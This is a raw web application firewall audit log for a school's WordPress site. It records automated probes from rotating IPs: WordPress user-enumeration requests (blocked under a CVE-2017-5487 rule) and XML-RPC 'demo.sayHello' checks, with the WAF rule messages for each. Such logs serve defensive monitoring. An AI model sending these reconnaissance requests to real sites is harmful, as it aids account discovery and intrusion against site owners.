Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20928b29-Z-- --0fbc4159-A-- [05/May/2025:23:40:01 +0700] aBjp4fZJDMuQndL03JNh4QAAAE8 103.236.140.4 35732 103.236.140.4 8181 --0fbc4159-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0fbc4159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fbc4159-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463201735934 2475 (- - -) Stopwatch2: 1746463201735934 2475; combined=1412, p1=474, p2=904, p3=0, p4=0, p5=34, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fbc4159-Z-- --952ad107-A-- [05/May/2025:23:40:04 +0700] aBjp5ARwKNFSM6B7_LakrQAAAJI 103.236.140.4 35768 103.236.140.4 8181 --952ad107-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --952ad107-C-- demo.sayHello --952ad107-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --952ad107-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463204868778 7791 (- - -) Stopwatch2: 1746463204868778 7791; combined=6006, p1=762, p2=4959, p3=51, p4=72, p5=98, sr=79, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --952ad107-Z-- --3a62134b-A-- [05/May/2025:23:43:39 +0700] aBjqu02V_h1VFAgsfgaCRQAAABY 103.236.140.4 37540 103.236.140.4 8181 --3a62134b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.112 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a62134b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a62134b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463419403153 3238 (- - -) Stopwatch2: 1746463419403153 3238; combined=1452, p1=474, p2=947, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a62134b-Z-- --aa79a55a-A-- [05/May/2025:23:43:42 +0700] aBjqvoZWvR7-42f6JrAReAAAANM 103.236.140.4 37576 103.236.140.4 8181 --aa79a55a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.112 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.112 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aa79a55a-C-- demo.sayHello --aa79a55a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa79a55a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463422387124 4563 (- - -) Stopwatch2: 1746463422387124 4563; combined=3703, p1=477, p2=2980, p3=35, p4=37, p5=99, sr=55, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa79a55a-Z-- --737f584f-A-- [05/May/2025:23:44:52 +0700] aBjrBPZJDMuQndL03JNilQAAAFY 103.236.140.4 38136 103.236.140.4 8181 --737f584f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --737f584f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --737f584f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463492604978 2991 (- - -) Stopwatch2: 1746463492604978 2991; combined=1463, p1=476, p2=951, p3=0, p4=0, p5=36, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --737f584f-Z-- --ee948801-A-- [05/May/2025:23:44:55 +0700] aBjrB_ZJDMuQndL03JNimwAAAFQ 103.236.140.4 38156 103.236.140.4 8181 --ee948801-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ee948801-C-- demo.sayHello --ee948801-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee948801-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463495329939 6548 (- - -) Stopwatch2: 1746463495329939 6548; combined=4754, p1=618, p2=3890, p3=40, p4=43, p5=98, sr=97, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee948801-Z-- --775a8d08-A-- [05/May/2025:23:45:19 +0700] aBjrH_ZJDMuQndL03JNiwwAAAE0 103.236.140.4 38352 103.236.140.4 8181 --775a8d08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --775a8d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --775a8d08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463519293941 3298 (- - -) Stopwatch2: 1746463519293941 3298; combined=1496, p1=505, p2=958, p3=0, p4=0, p5=33, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --775a8d08-Z-- --3d780809-A-- [05/May/2025:23:45:22 +0700] aBjrIvZJDMuQndL03JNiywAAAFI 103.236.140.4 38380 103.236.140.4 8181 --3d780809-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d780809-C-- demo.sayHello --3d780809-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d780809-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463522028483 5355 (- - -) Stopwatch2: 1746463522028483 5355; combined=4100, p1=514, p2=3343, p3=32, p4=34, p5=103, sr=80, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d780809-Z-- --b4ad365a-A-- [05/May/2025:23:45:22 +0700] aBjrIvZJDMuQndL03JNizQAAAEo 103.236.140.4 38386 103.236.140.4 8181 --b4ad365a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4ad365a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4ad365a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463522721260 2575 (- - -) Stopwatch2: 1746463522721260 2575; combined=1396, p1=456, p2=909, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4ad365a-Z-- --55c32270-A-- [05/May/2025:23:45:25 +0700] aBjrJfZJDMuQndL03JNi1gAAAFM 103.236.140.4 38428 103.236.140.4 8181 --55c32270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --55c32270-C-- demo.sayHello --55c32270-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --55c32270-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463525464712 5318 (- - -) Stopwatch2: 1746463525464712 5318; combined=4076, p1=519, p2=3334, p3=32, p4=35, p5=92, sr=72, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55c32270-Z-- --980c392f-A-- [05/May/2025:23:46:12 +0700] aBjrVE2V_h1VFAgsfgaCfgAAAAo 103.236.140.4 38840 103.236.140.4 8181 --980c392f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --980c392f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --980c392f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463572334489 2544 (- - -) Stopwatch2: 1746463572334489 2544; combined=1338, p1=445, p2=858, p3=0, p4=0, p5=35, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --980c392f-Z-- --7cd9ca5e-A-- [05/May/2025:23:46:15 +0700] aBjrVwRwKNFSM6B7_LalEgAAAIM 103.236.140.4 38876 103.236.140.4 8181 --7cd9ca5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7cd9ca5e-C-- demo.sayHello --7cd9ca5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cd9ca5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463575057943 5905 (- - -) Stopwatch2: 1746463575057943 5905; combined=4327, p1=555, p2=3526, p3=67, p4=38, p5=83, sr=94, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cd9ca5e-Z-- --7e73cc5d-A-- [05/May/2025:23:47:01 +0700] aBjrhQRwKNFSM6B7_LalKQAAAIw 103.236.140.4 39298 103.236.140.4 8181 --7e73cc5d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7e73cc5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e73cc5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463621196366 2746 (- - -) Stopwatch2: 1746463621196366 2746; combined=1417, p1=458, p2=928, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e73cc5d-Z-- --587cce1b-A-- [05/May/2025:23:47:02 +0700] aBjrhvZJDMuQndL03JNjgwAAAFI 103.236.140.4 39322 103.236.140.4 8181 --587cce1b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --587cce1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --587cce1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463622346791 2378 (- - -) Stopwatch2: 1746463622346791 2378; combined=1260, p1=460, p2=771, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --587cce1b-Z-- --37870b6d-A-- [05/May/2025:23:47:03 +0700] aBjrh02V_h1VFAgsfgaChAAAABA 103.236.140.4 39348 103.236.140.4 8181 --37870b6d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.88.86 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.88.86 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --37870b6d-C-- demo.sayHello --37870b6d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --37870b6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463623922957 5247 (- - -) Stopwatch2: 1746463623922957 5247; combined=4216, p1=544, p2=3457, p3=29, p4=31, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37870b6d-Z-- --8c515237-A-- [05/May/2025:23:47:05 +0700] aBjrifZJDMuQndL03JNjjAAAAE8 103.236.140.4 39370 103.236.140.4 8181 --8c515237-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8c515237-C-- demo.sayHello --8c515237-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c515237-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463625099880 5160 (- - -) Stopwatch2: 1746463625099880 5160; combined=4223, p1=516, p2=3487, p3=33, p4=34, p5=91, sr=81, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c515237-Z-- --11551873-A-- [05/May/2025:23:49:35 +0700] aBjsH_ZJDMuQndL03JNj_QAAAFc 103.236.140.4 40922 103.236.140.4 8181 --11551873-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --11551873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11551873-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463775920363 2967 (- - -) Stopwatch2: 